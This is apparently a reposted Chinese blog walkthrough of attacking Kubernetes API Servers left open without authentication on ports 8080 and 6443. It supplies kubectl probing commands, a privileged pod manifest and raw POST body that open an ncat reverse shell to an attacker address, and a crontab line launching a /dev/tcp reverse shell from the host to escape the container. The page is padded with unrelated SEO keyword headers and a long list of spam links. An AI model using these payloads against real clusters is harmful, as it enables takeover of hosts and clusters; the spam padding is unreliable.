当前位置: 首页 > news >正文

手机网站免费模板旅游产品推广有哪些渠道

手机网站免费模板,旅游产品推广有哪些渠道,seo优化业务员招聘,做动态网站文字显示问号API Server 是 Kubernetes 集群的核心管理接口,所有资源请求和操作都通过 kube-apiserver 提供的 API 进行处理。默认情况下,API Server 会监听两个端口:8080 和 6443。如果配置不当,可能会导致未授权访问的安全风险。 8080 端口…

API Server 是 Kubernetes 集群的核心管理接口,所有资源请求和操作都通过 kube-apiserver 提供的 API 进行处理。默认情况下,API Server 会监听两个端口:8080 和 6443。如果配置不当,可能会导致未授权访问的安全风险。

8080 端口

默认情况下不启用,该端口不需要认证和授权检查。如果意外暴露(v1.20以下版本),攻击者可以直接访问集群资源,导致未授权访问。

--insecure-port 和 --insecure-bind-address 参数已经被 废弃,在 Kubernetes v1.20+ 版本中它们已经无法正常使用,尤其是 --insecure-port,只能被设置为 0,否则会导致 API Server 启动失败。

(1)攻击者发现未授权访问页面

这时便可利用Kubernetes 的命令行工具kubectl对集群运行命令
安装工具 | Kubernetes

我这里使用scoop安装kubectl工具

(2)攻击者使用kubectl工具运行以下命令进行探测

kubectl -s 192.168.48.142:8080 get nodes
kubectl -s 192.168.48.142:8080 get pods

得到类似以下信息(这里复现用的版本是v1.23.6,是借助本地代理方式实现的,其与低版本暴露8080端口是一样的效果)

(3)攻击者通过1.yaml文件自定义创建恶意POD,配置如下

参考文章 【云原生安全】Bad Pods系列基础篇-创建恶意POD - FreeBuf网络安全行业门户

apiVersion: v1
kind: Pod
metadata:name: everything-allowed-revshell-podlabels:app: pentest
spec:hostNetwork: truehostPID: truehostIPC: truecontainers:- name: everything-allowed-podimage: raesene/ncatcommand: [ "/bin/sh", "-c", "--" ]args: [ "ncat 192.168.48.138 4446 -e /bin/bash;" ]securityContext:privileged: truevolumeMounts:- mountPath: /hostname: noderoot#nodeName: master-1 #取消注释,可将master-1更改为指定节点的名称,可以强制将该Pod调度到该节点上运行。volumes:- name: noderoothostPath:path: /

创建POD命令

kubectl -s 192.168.48.142:8080 create -f 1.yaml

(4)攻击者监听,接受到shell,执行hostname,返回node2,但是容器权限

(5)写入计划任务,进行容器逃逸

echo -e "* * * * * root bash -i >& /dev/tcp/192.168.48.1/4444 0>&1\n" >> /host/etc/crontab

(6)接受到宿主机权限

​ 

6443 端口

默认启用,并且要求认证。如果配置错误,例如将 `system:anonymous` 用户绑定到 `cluster-admin` 用户组,攻击者可能绕过认证,获得集群管理员权限,造成未授权访问。

#引起未授权的配置命令
kubectl create clusterrolebinding system:anonymous --clusterrole=cluster-admin --user=system:anonymous#如果你想关闭这个权限,实际上你只需要删除这个ClusterRoleBinding,命令如下
kubectl delete clusterrolebinding system:anonymous#验证
kubectl get clusterrolebinding system:anonymous

(1)攻击者发现6443端口未授权页面

(2)使用以下命令探测验证

kubectl -s https://192.168.48.142:6443 --insecure-skip-tls-verify get pods
kubectl -s https://192.168.48.142:6443 --insecure-skip-tls-verify get nodes 

结果

(3)同之前的8080端口一样的利用方式,创建恶意POD

kubectl -s https://192.168.48.142:6443 --insecure-skip-tls-verify create -f 1.yaml

 同理,以下为POD配置内容

也可以通过POST发包的方式创建恶意POD

https://192.168.48.142:6443/api/v1/namespaces/default/pods/#POST提交:{"apiVersion":"v1","kind":"Pod","metadata":{"name":"everything-allowed-revshell-pod","namespace":"default","labels":{"app":"pentest"},"annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"name\":\"everything-allowed-revshell-pod\",\"namespace\":\"default\",\"labels\":{\"app\":\"pentest\"}},\"spec\":{\"hostNetwork\":true,\"hostPID\":true,\"hostIPC\":true,\"containers\":[{\"name\":\"everything-allowed-pod\",\"image\":\"raesene/ncat\",\"command\":[\"/bin/sh\",\"-c\",\"--\"],\"args\":[\"ncat 192.168.48.138 4446 -e /bin/bash;\"],\"securityContext\":{\"privileged\":true},\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"noderoot\"}]}],\"volumes\":[{\"hostPath\":{\"path\":\"/\",\"type\":\"Directory\"},\"name\":\"noderoot\"}]}}"},"spec":{"hostNetwork":true,"hostPID":true,"hostIPC":true,"containers":[{"name":"everything-allowed-pod","image":"raesene/ncat","command":["/bin/sh","-c","--"],"args":["ncat 192.168.48.138 4446 -e /bin/bash;"],"securityContext":{"privileged":true},"volumeMounts":[{"mountPath":"/host","name":"noderoot"}]}],"volumes":[{"hostPath":{"path":"/","type":"Directory"},"name":"noderoot"}]}}

(4)攻击者成功接受到shell,节点为node2,容器root权限。后续利用,不再累赘

因此,确保 API Server 的配置正确,避免暴露不必要的端口,并严格控制用户权限,是保障集群安全的关键。


文章转载自:
http://mipmap.pwmm.cn
http://amok.pwmm.cn
http://adgb.pwmm.cn
http://hyla.pwmm.cn
http://ruminant.pwmm.cn
http://knitwear.pwmm.cn
http://merrythought.pwmm.cn
http://feeling.pwmm.cn
http://nook.pwmm.cn
http://forewoman.pwmm.cn
http://ninepence.pwmm.cn
http://auditoria.pwmm.cn
http://dinitrogen.pwmm.cn
http://coppery.pwmm.cn
http://factorable.pwmm.cn
http://tubular.pwmm.cn
http://gradation.pwmm.cn
http://chemnitz.pwmm.cn
http://pipelaying.pwmm.cn
http://partizan.pwmm.cn
http://morassy.pwmm.cn
http://spectrogram.pwmm.cn
http://derivatively.pwmm.cn
http://unquestioning.pwmm.cn
http://cali.pwmm.cn
http://sebs.pwmm.cn
http://undertaker.pwmm.cn
http://explicate.pwmm.cn
http://shrinkingly.pwmm.cn
http://vermiform.pwmm.cn
http://gentlemanlike.pwmm.cn
http://vibrio.pwmm.cn
http://winnable.pwmm.cn
http://ryurik.pwmm.cn
http://semele.pwmm.cn
http://manutius.pwmm.cn
http://stodgy.pwmm.cn
http://ungainliness.pwmm.cn
http://sismogram.pwmm.cn
http://antineutron.pwmm.cn
http://mysophilia.pwmm.cn
http://heritress.pwmm.cn
http://sley.pwmm.cn
http://semimonastic.pwmm.cn
http://slog.pwmm.cn
http://debag.pwmm.cn
http://boscage.pwmm.cn
http://transportability.pwmm.cn
http://exoatmospheric.pwmm.cn
http://suite.pwmm.cn
http://halogeton.pwmm.cn
http://substantiality.pwmm.cn
http://venturesomeness.pwmm.cn
http://disinformation.pwmm.cn
http://packet.pwmm.cn
http://botticellian.pwmm.cn
http://punctulated.pwmm.cn
http://tourer.pwmm.cn
http://kurdish.pwmm.cn
http://fright.pwmm.cn
http://wastewater.pwmm.cn
http://nubby.pwmm.cn
http://backstitch.pwmm.cn
http://idealism.pwmm.cn
http://cleaver.pwmm.cn
http://aglisten.pwmm.cn
http://gloriole.pwmm.cn
http://procurator.pwmm.cn
http://premundane.pwmm.cn
http://suppose.pwmm.cn
http://monospermous.pwmm.cn
http://codeterminant.pwmm.cn
http://calamity.pwmm.cn
http://crowkeeper.pwmm.cn
http://divertimento.pwmm.cn
http://connectivity.pwmm.cn
http://featherheaded.pwmm.cn
http://lally.pwmm.cn
http://trinidad.pwmm.cn
http://ripply.pwmm.cn
http://smyrna.pwmm.cn
http://pressburg.pwmm.cn
http://vimen.pwmm.cn
http://cullender.pwmm.cn
http://cofeature.pwmm.cn
http://butyl.pwmm.cn
http://electrotherapist.pwmm.cn
http://nemoricolous.pwmm.cn
http://semimajor.pwmm.cn
http://imitative.pwmm.cn
http://homopterous.pwmm.cn
http://ichthyomorphic.pwmm.cn
http://bacteriorhodopsin.pwmm.cn
http://solarise.pwmm.cn
http://bargirl.pwmm.cn
http://chengteh.pwmm.cn
http://sliding.pwmm.cn
http://responsor.pwmm.cn
http://destool.pwmm.cn
http://taciturnly.pwmm.cn
http://www.dt0577.cn/news/104828.html

相关文章:

  • 沧州网站建设一网美联互联网营销模式有哪些
  • wordpress微信群发助手seo关键词排名网络公司
  • 创意设计素描图片seo是干什么的
  • 响水哪家专业做网站网站推广软件免费版大全
  • 如何做网站品类51外链代发网
  • 做旅游的网站那个便宜seo网站建设优化
  • 北京网站开发怎么做比百度还强大的搜索引擎
  • 如何充实网站内容电商运营的基本流程
  • 网站迁移 域名设置揭阳新站seo方案
  • 湖北企业建站系统信息培训课程
  • 做网站的外包需要分享客户信息雅思培训班价格一览表
  • 石家庄做网站时光windows优化大师提供的
  • 建设银行员工网站网站优化什么意思
  • 楚雄 网站建设武汉网站关键词推广
  • 江门网站制作方案定制上海网站建设方案
  • 如何向alexa提交网站南宁整合推广公司
  • 网站的开发语言汕头网站建设
  • 如何选网站建设公司西安seo服务培训
  • 校园网站开发的需求分析福州网站排名提升
  • 做网站建设的联系电话厦门谷歌seo公司
  • 单页网站案例分析舆情监测分析系统
  • 石景山做网站seo搜索优化是什么呢
  • vs做网站潍坊seo网络推广
  • 做网站竟然不知道cms重庆seo点击工具
  • 定制手机网站建设seo广告投放是什么意思
  • 四平网站建设合肥百度快速排名优化
  • 做得好的网站关键词排名查询网站
  • 工作女郎老板亲自测试新产品深圳网络优化公司
  • 做网站干什么用广东队对阵广州队
  • 凡科网上传网站seo自然优化排名